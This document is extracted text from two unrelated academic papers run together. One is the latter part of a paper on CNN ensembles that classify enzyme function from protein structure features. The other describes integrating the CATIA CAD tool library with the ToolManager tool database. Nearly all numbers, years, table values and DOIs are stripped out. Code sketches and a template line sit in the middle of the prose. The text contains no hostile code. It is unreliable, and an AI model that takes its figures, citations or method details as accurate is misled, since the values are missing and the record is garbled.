once the network was trained, the class probabilities were obtained for the testing samples, which were introduced into the trained svm or knn classifier for final prediction. the svm model was linear and thus didn’t require any hyper-parameter optimization. due to the lack of hyper-parameters, no extra validation set was necessary. on the side, the author also examined non-linear svm with a gaussian radial basis function kernel, but didn’t observe any significant improvement; thus, the corresponding results are not reported. a classification result was deemed a true positive if the match with the highest probability was in first place in a rank-ordered list. the classification accuracy (percentage of correctly classified samples over all samples) was calculated for each fold and then averaged across the five folds. zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table confusion matrices for each fusion scheme and classification technique. classifier prediction by architecture prediction by architecture linear-svm ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . knn ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . classification performance common options for the network were used, except of the size of the filters which was adjusted to the dimensionality of the input data. specifically, the convolutional layer used neurons with a receptive field of size for the first two layers and for the third layer. the stride (specifying the sliding of the filter) was always . the number of filters was , and for the three layers, respectively, and the learning rate was . . the batch size was selected according to the information amount (dimensionality) of the input. it was assumed (and verified experimentally) that for more complicated data, a larger number of samples is required for learning. one thousand samples per batch were used for architecture , which takes as input all channels, and samples per batch for architecture , in which an independent cnn is trained for each channel. the dropout rate was %. the number of epochs was adjusted to the rate of convergence for each architecture ( for architecture and for architecture ). the average classification accuracy over the five folds for each enzymatic class is shown in table for both fusion schemes, whereas the analytic distribution of samples in each class is shown in the form of confusion matrices in table . in order to further assess the performance of the deep networks, receiver operating characteristic (roc) curves and area-under-the-curve (auc) values were calculated for each class for the selected scheme (based on knn and architecture ), as shown in fig. ). the calculations were performed based on the final decision scores in a one-versus-rest classification scheme. the decision scores for the knn classifier reflected the ratio of the within-class neighbors over total number of neighbors. the roc curve represents the true positive rate against the false positive rate and was produced by averaging over the five folds of the cross-validation experiments. zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure roc curves for each enzymatic class based on knn and architecture . 
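the decision-level fusion described above reduces to concatenating the per-network class-probability vectors and classifying them with a knn that uses one minus the spearman rank correlation as its distance. a minimal sketch, assuming scipy/scikit-learn and an illustrative value of k (the value used in the paper is not legible in the text), is:

```python
import numpy as np
from scipy.stats import spearmanr
from sklearn.neighbors import KNeighborsClassifier

def spearman_distance(x1, x2):
    # 1 - Spearman rank correlation between two fused probability vectors
    rho, _ = spearmanr(x1, x2)
    return 1.0 - rho

def fuse_and_classify(train_probs, train_labels, test_probs, k=5):
    """train_probs / test_probs: lists of per-CNN class-probability arrays,
    each of shape [n_samples, n_classes]; they are concatenated per sample."""
    x_train = np.hstack(train_probs)
    x_test = np.hstack(test_probs)
    knn = KNeighborsClassifier(n_neighbors=k, metric=spearman_distance)
    knn.fit(x_train, train_labels)
    return knn.predict(x_test)
```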
(a) ec , (b) ec , (c) ec , (d) ec , (e) ec , (f) ec . effect of sequence redundancy and sample size analysis of protein datasets is often performed after removal of redundancy, such that the remaining entries do not overreach a pre-arranged threshold of sequence identity. in the previously presented results, sequence/threshold metrics were not applied to remove sequence-redundancy. although structure similarity is affected by sequence similarity, the aim was not to lose structural entries (necessary for efficient learning) over a sequence based threshold cutoff. also, only x-ray crystallography data were used; such data represent a ‘snapshot’ of a given protein’s d structure. in order not to miss the multiple poses that the same protein may adopt in different crystallography experiments, the whole dataset was explored. subsequently, the performance of the method was also investigated on a less redundant dataset and the classification accuracy was compared in respect to the original (redundant) dataset, but randomly subsampled to include equal number of proteins. this experiment allows to assess the effect of redundancy under the same conditions (number of samples). since inference in deep networks requires the estimation of a very large number of parameters, a large amount of training data is required and therefore very strict filtering strategies could not be applied. a dataset, the pdbaanr (http://dunbrack.fccc.edu/guoli/pisces_download.php), pre-compiled by pisces (wang & dunbrack, ), was used that includes only non-redundant sequences across all pdb files (n= proteins, i.e., half in size of the original dataset). this dataset has one representative for each unique sequence in the pdb; representative chains are selected based on the highest resolution structure available and then the best r-values. non-x-ray structures are considered after x-ray structures. as a note, the author also explored the zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dunbrack.fccc.edu/guoli/pisces_download.php http://dx.doi.org/ . /peerj-cs. leaf algorithm (bull, muldoon & doig, ) which is especially designed to maximize the number of retained proteins and has shown improvement over pisces. however, the computational cost was too high (possibly due to the large number of samples) and the analysis was not completed. the classification performance was assessed on architecture by using % of the samples for training and % of the samples for testing. for the pdbaanr dataset, the accuracy was . % for knn and . % for linear-svm, whereas for the sub-sampled dataset it was . % for knn and . % for linear-svm. the results show that for the selected classifier (knn), the accuracy drops . % when the number of samples is reduced to the half, and it also drops additionally . % if the utilized sequences are less similar. the decrease in performance shows that the method is affected by the number of samples as well as by their similarity level. structural representation and complementarity of features next, some examples of the extracted feature maps are illustrated, in order to provide some insight on the representation of protein’s d structure. the average (over all samples) d histogram of torsion angles for each amino acid is shown in fig. . the horizontal and vertical axes at each plot represent torsion angles (in [− ◦, ◦]). it can be observed that the non-standard (asx, glx, unk) amino acids are very rare, thus their density maps have mostly zeros. 
the same color scale was used in all plots to make feature maps comparable, as ‘‘seen’’ by the deep network. since the histograms are (deliberately) not normalized for each sample, rare amino acids will have few visible features and due to the ‘max-pooling operator’ will not be selected as significant features. the potential of these feature maps to differentiate between classes is illustrated in fig. for three randomly selected amino acids (ala, gly, tyr). overall the spatial patterns in each class are distinctive and form a multi-dimensional signature for each sample. as a note, before training of the cnn ensemble, data standardization is performed by subtracting the mean density map. the same map is used to standardize the test sample during assessment. examples of features maps representing amino acid distances (xd) are illustrated in figs. and . figure illustrates an image slice across the rd dimension, i.e., one [m×m] channel, and as introduced in the d multichannel cnn, i.e., after mean-centering (over all samples). figure illustrates image slices (of size [m×hd]) across the st dimension averaged within each class. figure has been produced by selecting the same amino acids as in fig. for ease of comparison of the different feature representations. it can be noticed that for all classes most pairwise distances are concentrated in the last bin, corresponding to high distances between amino acids. also, as expected there are differences in quantity of each amino acid, e.g., by focusing on the last bin, it can be seen that ala and gly have higher values than tyr in most classes. moreover, the feature maps indicate clear differences between samples of different classes. the discrimination ability and complementary of the extracted features in respect to classification performance is shown in table . it can be observed that the relative position of amino acids and their arrangement in space (features xd) predict enzymatic function better than the backbone conformation (features xa). also, the fusion of network decisions zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure torsion angles density maps (ramachandran plots) averaged over all samples for each of the standard and three non-standard (asx, glx, unk) amino acids shown in alphabetical order from (a) to (w). the horizontal and vertical axes at each plot correspond to φ and ψ angles and vary from− ◦ (top left) to ◦ (right bottom). the color scale (blue to red) is in the range [ , ]. for an amino acid a, red means that the number of occurrences of the specific value (φ,ψ) in all observations of a (within and across proteins) is at least equal to the number of proteins. on the opposite, blue indi- cates a small number of occurrences, and is observed for rare amino acids or unfavorable conformations. (a) ala, (b) arg, (c) asn, (d) asp, (e) asx, (f) cys, (g) gln, (h) met, (i) glu, (j) glx, (k) gly, (l) his, (m) ile, (n) leu, (o) lys, (p) phe, (q) pro, (r) ser, (s) thr, (t) trp, (u) tyr, (v) unk, (w) val. table cross-validation accuracy (average ± standard deviation over five folds) for each feature set separately and after fusion of cnn outputs based on architecture . feature sets linear-svm knn xa (angles) . ± . . ± . xd (distances) . ± . . ± . ensemble . ± . . ± . based on correlation distance outperforms predictions from either network alone, but the difference is only marginal in respect to the predictions by xd. 
in all cases the differences in prediction for the performed experiments (during cross validation) was very small (usually standard deviation < . %), indicating that the method is robust to variations in training examples. zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure ramachandran plots averaged across samples within each class. rows correspond to amino acids and columns to functional classes. three amino acids (ala from (a) to (f), gly from (g) to (l) and tyr from (m) to (r)) are randomly selected for illustration of class separability. the horizontal and vertical axes at each plot correspond to φ and ψ angles and vary from− ◦ (top left) to ◦ (right bot- tom). the color scale (blue to red) is in the range [ , ] as illustrated in fig. . discussion a deep cnn ensemble was presented that performs enzymatic function classification through fusion in feature level and decision level. the method has been applied for the prediction of the primary ec number and achieved . % accuracy, which is a considerable improvement over the accuracy obtained in our previous work ( . % in amidi et al. ( ) and % in amidi et al. ( )) when only structural information was incorporated. these results were achieved without imposing any pre-selection criteria, such as based on sequence identity, thus the effect of evolutionary relationships, as confounding factor in the prediction of function from d structure, has not been sufficiently studied. since deep learning technology requires a large number of samples to produce generalizable models, a filtered dataset with only non-redundant proteins would be too small for reliable training. this is a limitation of the current approach, which mainly aimed to increase predictive power over previous methods using common features for structural representation and common classifiers such as svm and nearest neighbor, rather than addressing this confounding factor in the prediction of protein structure. many methods have been proposed in the literature using different features and different classifiers. nasibov & kandemir-cavas ( ) obtained %– % accuracy by applying knn-based classification on enzymes based on their amino acid composition. shen & chou ( ) fused results derived from the functional domain and evolution information and obtained . % average accuracy on , enzymes. on the same dataset, zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure histograms of paiwise amino acid distances averaged across samples within each class. the same three amino acids selected in fig. are also shown here (ala from (a) to (f), gly from (g) to (l) and tyr from (m) to (r)). the horizontal axis at each plot represents the histogram bins (distance values in the range [ , ]). the vertical axis at each plot corresponds to the amino acids sorted alphabetically from top to bottom (ala, arg, asn, asp, asx, cys, gln, met, glu, glx, gly, his, ile, leu, lys, phe, pro, ser, thr, trp, tyr, unk, val). thus each row shows the histogram of distances for a spe- cific pair of the amino acids (the one in the title and the one corresponding to the specific row). the color scale is the same for all plots and is shown horizontally at the bottom of the figure. wang et al. ( ) improved the accuracy (which ranged from % to % when predicting the first three ec digits) by using sequence encoding and svm for hierarchy labels. kumar & choudhary ( ) reported overall accuracy of . 
% in predicting the main class for , enzymes using random forests. volpato, adelfio & pollastri ( ) applied neural networks on the full sequence and achieve % correct classification on , non-redundant proteins. most of the previous methods incorporate sequence-based features. many were assessed on a subset of enzymes acquired after imposition of different pre-selection criteria and levels of sequence similarity. more discussion on machine learning techniques for single-label and multi-label enzyme classification can be found in amidi et al. ( ). assessment of the relationship between function and structure (todd, orengo & thornton, ) revealed % conservation of the fourth ec digit for proteins with up to % sequence identity. similarity, devos & valencia ( ) concluded that enzymatic zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. function is mostly conserved for the first digit of ec code whereas more detailed functional characteristics are poorly conserved. it is generally believed that as sequences diverge, d protein structure becomes a more reliable predictor than sequence, and that structure is far more conserved than sequence in nature (illergård, ardell & elofsson, ). the focus of this study was to explore the predictive ability of d structure and provide a tool that can generalize in cases where sequence information is insufficient. thus, the presented results are not directly comparable to the ones of previous methods due to the use of different features and datasets. if desired, the current approach can easily incorporate also sequence-related features. in such a case however, the use of non-homologous data would be inevitable for rigorous assessment. the reported accuracy is the average of five folds on the testing set. a separate validation set was not used within each fold, because the design of the network architecture (size of convolution kernel, number of layers, etc.) and the final classifier (number of neighbors in knn) were preselected and not optimized within the learning framework. additional validation and optimization of the model would be necessary to improve performance and provide better insight into the capabilities of this method. a possible limitation of the proposed approach is that the extracted features do not capture the topological properties of the d structure. due to the statistical nature of the implemented descriptors, which were calculated by considering the amino acids as elements in euclidean space, connectivity information is not strictly retained. the author and colleagues recently started to investigate in parallel the predictive power of the original d structure, represented as a volumetric image, without the extraction of any statistical features. since the more detailed representation increased the dimensionality considerably, new ways are being explored to optimally incorporate the relationship between the structural units (amino-acids) in order not to impede the learning process. conclusions a method was presented that extracts shape features from the d protein geometry that are introduced into a deep cnn ensemble for enzymatic function prediction. the investigation of protein function based only on structure reveals relationships hidden at the sequence level and provides the foundation to build a better understanding of the molecular basis of biological complexity. 
overall, the presented approach can provide quick protein function predictions on extensive datasets opening the path for relevant applications, such as pharmacological target identification. future work includes application of the method for prediction of the hierarchical relation of function subcategories and annotation of enzymes up to the last digit of the enzyme classification system. acknowledgements the authors want to thank prof. n paragios from the center for visual computing, centralesupélec, paris, for providing the means to complete this study and dr. d vlachakis from the multidimensional data analysis and knowledge management laboratory, university of patras, for useful discussions on the biological aspects. zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this research was partially supported by european research council grant diocles (erc-stg- ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: european research council grant diocles: erc-stg- . competing interests the authors declare there are no competing interests. author contributions • evangelia i. zacharaki conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data can be found in the pdb public database: www.rcsb.org/pdb/. the code can be downloaded from https://github.com/ezachar/peerj. the code can run either using pdb entries downloaded locally or by accessing the entries from the pdb during run-time. references amidi a, amidi s, vlachakis d, paragios n, zacharaki ei. . a machine learning methodology for enzyme functional classification combining structural and protein sequence descriptors. in: bioinformatics and biomedical engineering. cham: springer, – . amidi s, amidi a, vlachakis d, paragios n, zacharaki ei. . automatic single- and multi-label enzymatic function prediction by machine learning. peerj :e doi . /peerj. . bermejo ga, clore gm, schwieters cd. . smooth statistical torsion angle potential derived from a large conformational database via adaptive kernel density estimation improves the quality of nmr protein structures. protein science ( ): – doi . /pro. . borgwardt km, ong cs, schönauer s, vishwanathan s, smola aj, kriegel h-p. . protein function prediction via graph kernels. bioinformatics (suppl ):i –i doi . /bioinformatics/bti . borro lc, oliveira sr, yamagishi me, mancini al, jardine jg, mazoni i, santos ed, higa rh, kuser pr, neshich g. . predicting enzyme class from protein structure using bayesian classification. genetics and molecular research ( ): – . zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com www.rcsb.org/pdb/ https://github.com/ezachar/peerj http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /pro. http://dx.doi.org/ . /bioinformatics/bti http://dx.doi.org/ . /peerj-cs. bull sc, muldoon mr, doig aj. . maximising the size of non-redundant protein datasets using graph theory. plos one ( ):e doi . /journal.pone. . cai c, han l, ji zl, chen x, chen yz. . 
svm-prot: web-based support vector machine software for functional classification of a protein from its primary sequence. nucleic acids research ( ): – doi . /nar/gkg . chang c-c, lin c-j. . libsvm: a library for support vector machines. acm transactions on intelligent systems and technology (tist) ( ):article doi . / . . chen c, tian y-x, zou x-y, cai p-x, mo j-y. . using pseudo-amino acid com- position and support vector machine to predict protein structural class. journal of theoretical biology ( ): – doi . /j.jtbi. . . . devos d, valencia a. . practical limits of function prediction. proteins: structure, function, and bioinformatics ( ): – doi . / - ( ) : < ::aid-prot > . .co; -s. dobson pd, doig aj. . predicting enzyme class from protein structure without alignments. journal of molecular biology ( ): – doi . /j.jmb. . . . godzik a. . metagenomics and the protein universe. current opinion in structural biology ( ): – doi . /j.sbi. . . . han l, cai c, ji z, cao z, cui j, chen y. . predicting functional family of novel enzymes irrespective of sequence similarity: a statistical learning approach. nucleic acids research ( ): – doi . /nar/gkh . huang w-l, chen h-m, hwang s-f, ho s-y. . accurate prediction of enzyme subfamily class using an adaptive fuzzy k-nearest neighbor method. biosystems ( ): – doi . /j.biosystems. . . . illergård k, ardell dh, elofsson a. . structure is three to ten times more conserved than sequencea study of structural response in protein cores. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep con- volutional neural networks. in: advances in neural information processing systems. – . kumar c, choudhary a. . a top-down approach to classify enzyme functional classes and sub-classes using random forest. eurasip journal on bioinformatics and systems biology ( ): – doi . / - - - . lee bj, shin ms, oh yj, oh hs, ryu kh. . identification of protein functions using a machine-learning approach based on sequence-derived properties. proteome science : doi . / - - - . li y, shibuya t. . malphite: a convolutional neural network and ensemble learning based protein secondary structure predictor. in: ieee international conference on bioinformatics and biomedicine (bibm). piscataway: ieee, – . zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nar/gkg http://dx.doi.org/ . / . http://dx.doi.org/ . /j.jtbi. . . http://dx.doi.org/ . / - ( ) : < ::aid-prot > . .co; -s http://dx.doi.org/ . /j.jmb. . . http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . /nar/gkh http://dx.doi.org/ . /j.biosystems. . . http://dx.doi.org/ . /prot. http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. lin z, lanchantin j, qi y. . must-cnn: a multilayer shift-and-stitch deep convolutional architecture for sequence-based protein structure prediction. in: th aaai conference on artificial intelligence. menlo park: aaai. lu l, qian z, cai y-d, li y. . ecs: an automatic enzyme classifier based on func- tional domain composition. computational biology and chemistry ( ): – doi . /j.compbiolchem. . . . nagao c, nagano n, mizuguchi k. . prediction of detailed enzyme functions and identification of specificity determining residues by random forests. plos one ( ): – doi . /journal.pone. . nasibov e, kandemir-cavas c. . 
efficiency analysis of knn and minimum distance-based classifiers in enzyme family prediction. computational biology and chemistry ( ): – doi . /j.compbiolchem. . . . qiu j-d, huang j-h, shi s-p, liang r-p. . using the concept of chou’s pseudo amino acid composition to predict enzyme family classes: an approach with support vector machine based on discrete wavelet transform. protein and peptide letters ( ): – doi . / . sharma m, garg p. . computational approaches for enzyme functional class prediction: a review. current proteomics ( ): – doi . / . shen h-b, chou k-c. . ezypred: a top–down approach for predicting enzyme func- tional classes and subclasses. biochemical and biophysical research communications ( ): – doi . /j.bbrc. . . . spencer m, eickholt j, cheng j. . a deep learning network approach to ab initio protein secondary structure prediction. ieee/acm transactions on computational biology and bioinformatics (tcbb) ( ): – doi . /tcbb. . . todd ae, orengo ca, thornton jm. . evolution of function in protein superfam- ilies, from a structural perspective. journal of molecular biology ( ): – doi . /jmbi. . . vedaldi a, lenc k. . matconvnet: convolutional neural networks for matlab. in: proceedings of the rd acm international conference on multimedia. new york: acm, – . volpato v, adelfio a, pollastri g. . accurate prediction of protein enzymatic class by n-to- neural networks. bmc bioinformatics ( ): doi . / - - - . wang g, dunbrack rl. . pisces: a protein sequence culling server. bioinformatics ( ): – doi . /bioinformatics/btg . wang y-c, wang x-b, yang z-x, deng n-y. . prediction of enzyme subfamily class via pseudo amino acid composition by incorporating the conjoint triad feature. protein and peptide letters ( ): – doi . / . wang y-c, wang y, yang z-x, deng n-y. . support vector machine prediction of enzyme function with conjoint triad feature and hierarchical context. bmc systems biology ( ): doi . / - - - . zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.compbiolchem. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.compbiolchem. . . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j.bbrc. . . http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . / http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. webb ec. . enzyme nomenclature . in: recommendations of the nomenclature committee of the international union of biochemistry and molecular biology on the nomenclature and classification of enzymes. san diego: academic press. yadav sk, tiwari ak. . classification of enzymes using machine learning based approaches: a review. machine learning and applications ( / ): – . zhou x-b, chen c, li z-c, zou x-y. . using chou’s amphiphilic pseudo-amino acid composition and support vector machine for prediction of enzyme subfamily classes. journal of theoretical biology ( ): – doi . /j.jtbi. . . . zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jtbi. . . http://dx.doi.org/ . /peerj-cs. your paper's title starts here: please center international journal of advanced network, monitoring, and controls vol. , no. , research of integration technology between catia and toolmanager based on caa li yihui xi'an high voltage apparatus research institute co., ltd. 
/ xi dian group, xi'an, china, liyh@xihari.com
abstract: in order to implement the integration of the catia tool library and the enterprise tool database, the catia software was further developed using caa. a caa/macro-based integration scheme for the two libraries is proposed, and the development process is presented. in the caa environment provided by catia, the calling, conversion and assignment of tool information between catia and toolmanager were studied, and the dynamic calling, association and driving of catia-based tool information were implemented successfully.
keywords: catia, toolmanager, tool library, caa
introduction: catia is cad/cae/cam integration software from the french company dassault systemes, which provides users with an integrated digital environment covering requirements from design to manufacture [ ]. catia provides . -axis, -axis and multi-axis cnc machining modules. users can write nc programs in catia, and can either call a tool from the catia tool library or manually enter parameters to create a tool [ ]. to manage the growing variety of cutting tools, many enterprises use a professional tool management system such as the toolmanager software, a highly integrated tool information management system developed by a german company. it can effectively manage individual tool components, tool assemblies, machine setting bills, tool drawings and tool supplier information. the tool library mainly helps tool-room staff manage tools, and supports process planning staff in three-dimensional process design and cnc programming. catia has powerful cnc machining modules. the basic operations of cnc machining include setting the processing elements, setting the tool path, setting tool parameters, setting feed/retract moves, cutting simulation and generating nc programs. tool selection is very important in nc programming, because each machining operation needs to specify a processing tool. at present, in enterprise tool management, each business unit uses and maintains its own tools, and users cannot exchange information or share data. for example, during cnc programming, staff use the catia tool management functions and redefine their own tool models and data. the nc programming staff cannot obtain the latest stock and usage information, so tools may not be purchased in time, which affects the production cycle. because nc programmers lack this information, tool selection becomes inconsistent and manufacturing costs increase. as the product mix changes and is adjusted, the types and specifications of tools purchased by machining enterprises will continue to change. if the cnc staff cannot grasp the information about the enterprise's existing tools and select tools that do not match them, the applicability of the nc programs is reduced, seriously affecting the production schedule. achieving the integration of the catia tool library and the enterprise tool management system is therefore very important. we therefore studied the integration technology of the catia tool library. based on an enterprise digital manufacturing environment, the catia software is further developed using the component application architecture (caa), dynamic integration of the catia and toolmanager tool libraries is achieved, and the result has been successfully applied in the enterprise [ ].
the cnc staff can call tool directly from catia tool library, and can grasp the company's existing tools, and improve the efficiency of cnc programming, and ensure the applicability of cnc code. it provides a good basis for successful implementation of digital manufacturing system. . a further developing method for catia as powerful engineering software, catia has a strong opening performance. users can follow their own needs, using different ways to the development in various degrees. catia secondary development interface communication with external interface is in two ways: in-process applications approach and out-process applications approach. in in-process applications, catia software and scripts to run in the same process address space, such as macro (macro) mode. in the catia environment, the menu record macro, and generate vb script sequence. when the macro starts running, catia is in a non-activated and variables cannot be stored between calling macro. this relatively simple approach can be completed in the catia environment. in out- process applications, catia and external applications run in different process address space. in the case of catia running, external process control catia through the interface, it can create and modify catia environment and geometry data, size, etc. it can also support object linking and embedding. specifically, there are two main ways to catia secondary development: using a macro to the second development and using of catia component application architecture (caa) to the further development [ , ]. . using a macro to the further development users use macro recording a series of operation, automatically generated code, and use vbscript as editing tools, it is a customized interactive way. catia provides catia automation api for vbscript on the secondary development, automation api has the ability to communicate with any ole-compatible platform, automation interface can call "inputbox" and "msgbox" function to get user input information and output [ ]. for nt users, you can apply more complex visual basic to define the input and output interfaces. an icon can be associated with a macro in running, and be into catia display frames. the characteristics of using the macro to the further development of catia are convenient, not only to achieve the desired function, but also to record the macro method and obtain the required procedures. but the disadvantage is that catia cannot perform other operations when the macro is running. the function need be achieved was limited. . . using the component application architecture (caa) on the further development of catia [ , ] caa is an acronym component application architecture, is a platform of dassault systems, international journal of advanced network, monitoring, and controls vol. , no. , which expanding products and customizing and developing for customers. it uses object-oriented programming language; object-oriented programming (object-oriented- programming, oop) has become mainstream in the field of software development and design. caa's development can be seen as a combination and expansion of its component objects. caa uses com technology and ole technology, com as a software architecture has a better module independence, scalability, making it easier to caa programming and become standardized, so that the code more concise. in the support of the caa structure, dassault systems as can be established as the building block, this structure is very suitable for the growth and development of the system. 
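as a concrete illustration of the out-process automation route described earlier in this subsection, a small script can attach to a running catia session through its com/ole automation interface. the sketch below uses python with the pywin32 package rather than vbscript; beyond the standard "CATIA.Application" automation object, the document handling shown here is only an illustrative assumption of what an external tool-management application might query.

```python
# requires the pywin32 package on a windows machine with catia installed
import win32com.client

# attach to (or start) the catia automation server exposed over com/ole
catia = win32com.client.Dispatch("CATIA.Application")
catia.Visible = True

# walk the currently open documents and report their names: the kind of
# out-process query an external tool-management application could perform
documents = catia.Documents
for i in range(1, documents.Count + 1):
    print(documents.Item(i).Name)
```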
catia uses caa on the further development, its benefits are: reusability, abstraction, encapsulation, etc. however, the complexity of dassault systems and depth involved in the content of caa itself, the second development using caa must have some complexity and difficulty. users familiar with the relevant application system of dassault systems, they must also have basic knowledge of software development, the basic programming skills of c + + (or java), com technology, etc. . integration of catia tool library using a macro . . scheme of integrated tool library in order to achieving integration, when nc program was written and executed tool selection function, catia tool class and the subordinate toolmanager class can be list [ ]. on the other hand, catia to be able to dynamically query the tool data in toolmanager and the selected tool can be returned to the catia environment, finally parameterization drive tool graphics. when nc machining tool is selected using catia, the view of the tool data is the dynamic tool library, it can realize integration of catia and toolmanager. the integration above mainly is to call tool from toolmanager tool library, and then assign the property value of tool to catia nc machining tool module model. the use of macros in the implementation for the further development cannot call the catia function. though further developed using caa, calling for information, converting information and valuating information of catia and toolmanager is researched, finally, the dynamic calling, association and driving of catia-based tool information is implemented successfully [ ]. fig. shows the tool library integrated solution. international journal of advanced network, monitoring, and controls vol. , no. , fig. . tool library integrated solution. . . development process of the integrated tool library to ensure the integrity and accuracy of tool information in library toolmanager tool library, and nc programmers can select the needed tool, before carrying out an integrated development tool, the description field for each type of tool in toolmanager tool library must be sorted combining with enterprise tool existing type for tools, and make it fit the classes and attributes of catia tool. to make catia tool class and toolmanager class correspond, because catia tool that can add new classes, we need to complete further development of catia. the development process is as follows: (i)the corresponding file in catia v r ------ \ program files \ dassault systemes\ b \ intel_a \ resources \ graphic replaced by *. feat file in feat folder. (ii)use wordpad to open mfguserattributes.xml in catia v r ------\ program files \ dassault systemes \ b \ intel_a \ startup \ manufacturing \ samples, and modify the file contents in the second row: results are as follows: <!doctype catspecs system"d:\programfiles\dassaultsystemes\b \intel_a\resources\dtd\mfguserattributes.dtd" >.in this document, we can add tool properties in accordance with the provisions meaning of the field. (iii)start windows/system /cmd.exe:run mfgresourceattr.exe in the test folder, compile mfguserattibutes.xml in \program files\dassault systemes\b \ intel_a\startup\manufacturing\ samples directory, and add tool properties to manufacturing resources extensions. feat and manufacturing literals. feat, and complete the tool additional properties. the additional properties of tool are the basis of building this module. . implementation of integrated international journal of advanced network, monitoring, and controls vol. , no. 
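the core of the data flow described above is mapping a tool record retrieved from the toolmanager database onto the attribute set of the catia nc machining tool model. the sketch below shows that mapping step in python; the database column names, the catia attribute names and the example record are hypothetical stand-ins, since the actual field names are defined by the enterprise customization (mfguserattributes.xml) described in the next subsection.

```python
# hypothetical column names from the tool database and hypothetical catia tool
# attribute names; the real names come from the enterprise customization.
DB_TO_CATIA_ATTRIBUTE = {
    "tool_number": "ToolNumber",
    "nominal_diameter": "NominalDiameter",
    "corner_radius": "CornerRadius",
    "cutting_length": "CuttingLength",
    "overall_length": "OverallLength",
}

def build_catia_tool_parameters(db_record):
    """Translate one tool record (a dict keyed by database column names) into the
    attribute/value pairs used to drive the parametric tool model in catia."""
    missing = [col for col in DB_TO_CATIA_ATTRIBUTE if col not in db_record]
    if missing:
        raise ValueError(f"tool record is missing columns: {missing}")
    return {catia_name: db_record[col] for col, catia_name in DB_TO_CATIA_ATTRIBUTE.items()}

# illustrative record as it might be returned from a toolmanager query
record = {"tool_number": "EM-16-R2", "nominal_diameter": 16.0, "corner_radius": 2.0,
          "cutting_length": 32.0, "overall_length": 92.0}
print(build_catia_tool_parameters(record))
```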
, combining with actual situation of enterprises, this paper use the method of developing macro to make the second development of the catia, and achieve integration of catia tool and enterprise tool database, the following is system operation interface. the catia tool dynamic calling data and driving module has two main functions: tool data call function: according to the selected class of tool dynamic call tool data tool. tool data-driven features: basing on the selected tool, drive the parameters graphics and toolparameters. the use as follows: first, start the catia v r , into the cnc machining module, select the required cnc machining tool, and then start the tool selection interface, finally implement the integration of two software. conclusion we studied a technology of integration research tool library of catia in shaanxi scientific technology research project, which is named discrete manufacturing enterprise decision support system based on heterogeneous information integration(project no: k - ). tool database creating theory and structure of catia were analyzed. catia secondary development methods were compared and studied. the methods of catia integrated tool database using of macro were proposed. combining with the actual situation of business, the software module is realizing integrated of catia tool library. the successful integration of catia tool database and tool library can supply service as follows: (i)for nc programming, directly select tool from catia tool library, greatly reducing the work of the nc programmer to set parameters of the tool, improving the efficiency of nc programming. (ii)the integrating of catia tool library, it makes tool selected by nc programming closely link to the production site tool, ensuring the applicability of nc program. (iii)improve automation of the enterprise digital manufacturing system and degree of integration. this work was supported by shaanxi provincial scientific and technological research projects under grant nos. df . references [ ]jacques f. delacur, optis, and jean-luc cuinier, presentation of the first plm integrated optical simulation software for the design and engineering of optical systems, proceedings of spie---the international society for optics and photonics, st. etienne, france, vol. , , pp. – . [ ]xu pengcheng, the road of digital manufacturing system, aeronautical manufacturing technology, vol. , , pp. – . international journal of advanced network, monitoring, and controls vol. , no. , [ ]dong yixin, xi ping, secondary development of catia interface, aeronautical manufacturing technology, vol. , , pp. – . [ ]dong yixin, xi ping, the movement simulator of five-axis nc machine based on secondary development of catia, mechanical engineer, vol. , , pp. – . [ ]chen ming, deng shifu, zhu rui, and zhou laishui, cad/cae integration based on catia platform, journal of computer-aided design & computer graphics, vol. , , pp. – . [ ]deng dongmei, zhou laishui, chen gong, an luling, and li wei, design and implementation of catia-based construction tool for component library, journal of south china university of technology, vol. , , pp. – . [ ]wang su, chen nanfei, zhu yuming, and zhu xinxiong, catia-based modeling method for object made of functionally gradient materials, china mechanical engineering, vol. , , pp. – . [ ]yang liuhui, zhang heming, research and application of com-based product information integration in catia environment, computer engineering and applications, vol. , , pp. – . 
